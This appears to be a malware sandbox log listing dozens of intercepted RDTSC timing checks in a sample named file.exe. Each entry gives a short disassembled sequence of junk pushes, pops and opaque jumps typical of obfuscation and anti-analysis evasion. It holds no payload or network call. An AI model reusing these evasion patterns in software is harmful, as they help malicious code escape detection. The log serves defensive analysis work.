Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB9750 second address: C99489 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push ebp 0x00000011 call 00007F3780D2BA68h 0x00000016 pop ebp 0x00000017 mov dword ptr [esp+04h], ebp 0x0000001b add dword ptr [esp+04h], 00000014h 0x00000023 inc ebp 0x00000024 push ebp 0x00000025 ret 0x00000026 pop ebp 0x00000027 ret 0x00000028 mov ecx, dword ptr [ebp+122D207Bh] 0x0000002e call dword ptr [ebp+122D2507h] 0x00000034 push ecx 0x00000035 push eax 0x00000036 push edx 0x00000037 pushad 0x00000038 popad 0x00000039 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C99489 second address: C9948D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C7115A second address: C71174 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3780D2BA76h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C71174 second address: C71189 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 jc 00007F3780CDC706h 0x0000000b pop ebx 0x0000000c pushad 0x0000000d js 00007F3780CDC706h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CEF939 second address: CEF947 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jne 00007F3780D2BA66h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CEF947 second address: CEF94B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CEFC09 second address: CEFC0F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CEFD53 second address: CEFD5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F3780CDC706h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CEFD5D second address: CEFD67 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F3780D2BA66h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CF018B second address: CF018F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CF018F second address: CF0193 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CF1D7D second address: CF1D9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F3780CDC719h 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CF32BA second address: CF32DB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F3780D2BA6Fh 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edi 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push edx 0x00000010 jnp 00007F3780D2BA66h 0x00000016 pop edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CF32DB second address: CF32E0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CF72EE second address: CF730B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F3780D2BA76h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CF730B second address: CF7311 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CF7454 second address: CF7458 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CF7458 second address: CF745C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CF745C second address: CF746A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnl 00007F3780D2BA66h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CF746A second address: CF746E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CF746E second address: CF7485 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push ecx 0x00000008 pushad 0x00000009 jbe 00007F3780D2BA66h 0x0000000f jno 00007F3780D2BA66h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CF7485 second address: CF7494 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 je 00007F3780CDC706h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CF7A15 second address: CF7A2A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3780D2BA71h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CF7A2A second address: CF7A44 instructions: 0x00000000 rdtsc 0x00000002 js 00007F3780CDC713h 0x00000008 jmp 00007F3780CDC70Bh 0x0000000d push edi 0x0000000e pop edi 0x0000000f push esi 0x00000010 push edx 0x00000011 pop edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CF7B92 second address: CF7B9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CF7B9D second address: CF7BA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CF7D0C second address: CF7D28 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F3780D2BA77h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CF7D28 second address: CF7D2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CF82A2 second address: CF82AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 js 00007F3780D2BA66h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CF703E second address: CF7042 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CFA20B second address: CFA212 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CFA212 second address: CFA22E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3780CDC712h 0x00000009 js 00007F3780CDC706h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CFA22E second address: CFA232 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CFA232 second address: CFA253 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F3780CDC710h 0x0000000e push eax 0x0000000f push edx 0x00000010 jnc 00007F3780CDC706h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CFA253 second address: CFA26E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jns 00007F3780D2BA66h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F3780D2BA6Ch 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CFA26E second address: CFA274 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CFDC67 second address: CFDC6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CFDC6F second address: CFDC74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CFD469 second address: CFD46F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CFD46F second address: CFD475 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CFD475 second address: CFD485 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jne 00007F3780D2BA68h 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CFD485 second address: CFD49C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3780CDC711h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CFD5F1 second address: CFD5F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CFD7F7 second address: CFD7FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CFD948 second address: CFD971 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 ja 00007F3780D2BA68h 0x0000000b push ecx 0x0000000c jmp 00007F3780D2BA75h 0x00000011 pop ecx 0x00000012 popad 0x00000013 push eax 0x00000014 push ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D04AF5 second address: D04B1C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F3780CDC711h 0x00000008 jno 00007F3780CDC706h 0x0000000e jmp 00007F3780CDC70Bh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D04F0B second address: D04F0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D04F0F second address: D04F15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D04F15 second address: D04F1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB9124 second address: CB9128 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB9128 second address: CB912E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB912E second address: CB91A1 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 mov dword ptr [ebp+1245B225h], edi 0x0000000f mov ebx, dword ptr [ebp+1248A211h] 0x00000015 push 00000000h 0x00000017 push esi 0x00000018 call 00007F3780CDC708h 0x0000001d pop esi 0x0000001e mov dword ptr [esp+04h], esi 0x00000022 add dword ptr [esp+04h], 00000014h 0x0000002a inc esi 0x0000002b push esi 0x0000002c ret 0x0000002d pop esi 0x0000002e ret 0x0000002f mov edx, dword ptr [ebp+122D1CADh] 0x00000035 mov dword ptr [ebp+122D2454h], esi 0x0000003b cmc 0x0000003c add eax, ebx 0x0000003e push 00000000h 0x00000040 push edi 0x00000041 call 00007F3780CDC708h 0x00000046 pop edi 0x00000047 mov dword ptr [esp+04h], edi 0x0000004b add dword ptr [esp+04h], 0000001Ah 0x00000053 inc edi 0x00000054 push edi 0x00000055 ret 0x00000056 pop edi 0x00000057 ret 0x00000058 add edi, dword ptr [ebp+122D1D9Fh] 0x0000005e nop 0x0000005f jnl 00007F3780CDC71Ah 0x00000065 push eax 0x00000066 push edx 0x00000067 push esi 0x00000068 pop esi 0x00000069 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D05211 second address: D0522C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3780D2BA77h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0522C second address: D0524B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jmp 00007F3780CDC718h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0524B second address: D05251 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D05251 second address: D0525C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push esi 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0A587 second address: D0A58D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0A58D second address: D0A591 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0A591 second address: D0A5A5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F3780D2BA6Ah 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0A5A5 second address: D0A5A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0F335 second address: D0F33F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0F33F second address: D0F345 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0F345 second address: D0F349 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0F349 second address: D0F36B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F3780CDC716h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0F36B second address: D0F36F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0F36F second address: D0F373 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0E9AA second address: D0E9F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3780D2BA75h 0x00000009 popad 0x0000000a jl 00007F3780D2BA86h 0x00000010 jmp 00007F3780D2BA6Ch 0x00000015 jmp 00007F3780D2BA74h 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F3780D2BA6Bh 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0ECDE second address: D0ECE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D1452A second address: D1453A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F3780D2BA66h 0x0000000a pop edi 0x0000000b pushad 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D1453A second address: D14547 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F3780CDC706h 0x0000000a push eax 0x0000000b pop eax 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D14547 second address: D14595 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3780D2BA6Eh 0x00000007 push esi 0x00000008 jmp 00007F3780D2BA6Eh 0x0000000d pop esi 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push ecx 0x00000012 jmp 00007F3780D2BA73h 0x00000017 pop ecx 0x00000018 pushad 0x00000019 jmp 00007F3780D2BA73h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C79901 second address: C79905 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D157E9 second address: D157F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F3780D2BA66h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D16075 second address: D16080 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D16080 second address: D16084 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D1F28C second address: D1F29C instructions: 0x00000000 rdtsc 0x00000002 jo 00007F3780CDC708h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D1F29C second address: D1F2C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jnp 00007F3780D2BA66h 0x0000000c popad 0x0000000d jmp 00007F3780D2BA78h 0x00000012 push edi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D1E5A9 second address: D1E5CD instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F3780CDC706h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b jmp 00007F3780CDC70Dh 0x00000010 jmp 00007F3780CDC70Bh 0x00000015 pop ecx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D1E8B2 second address: D1E8D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F3780D2BA66h 0x0000000a pop ebx 0x0000000b jmp 00007F3780D2BA6Ch 0x00000010 pop esi 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 pop eax 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D1E8D0 second address: D1E8D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D1E8D9 second address: D1E8E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F3780D2BA66h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D1EBAC second address: D1EC01 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007F3780CDC71Eh 0x0000000c jns 00007F3780CDC708h 0x00000012 pushad 0x00000013 jp 00007F3780CDC706h 0x00000019 pushad 0x0000001a popad 0x0000001b ja 00007F3780CDC706h 0x00000021 popad 0x00000022 popad 0x00000023 pushad 0x00000024 jmp 00007F3780CDC70Fh 0x00000029 jno 00007F3780CDC70Ch 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D1EC01 second address: D1EC18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F3780D2BA6Fh 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D2847E second address: D28490 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F3780CDC706h 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C7476D second address: C74788 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F3780D2BA75h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C74788 second address: C747B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3780CDC70Fh 0x00000007 jno 00007F3780CDC70Eh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push edx 0x00000013 pop edx 0x00000014 jno 00007F3780CDC706h 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C747B5 second address: C747C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F3780D2BA6Bh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D26646 second address: D2664C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D267C3 second address: D267C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D26CC5 second address: D26CCD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D26E12 second address: D26E18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D26E18 second address: D26E1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D26E1C second address: D26E3A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jno 00007F3780D2BA66h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007F3780D2BA6Fh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D26E3A second address: D26E47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 js 00007F3780CDC71Eh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D27121 second address: D27125 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D272A6 second address: D272B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jc 00007F3780CDC70Ah 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d push edx 0x0000000e pop edx 0x0000000f rdtsc
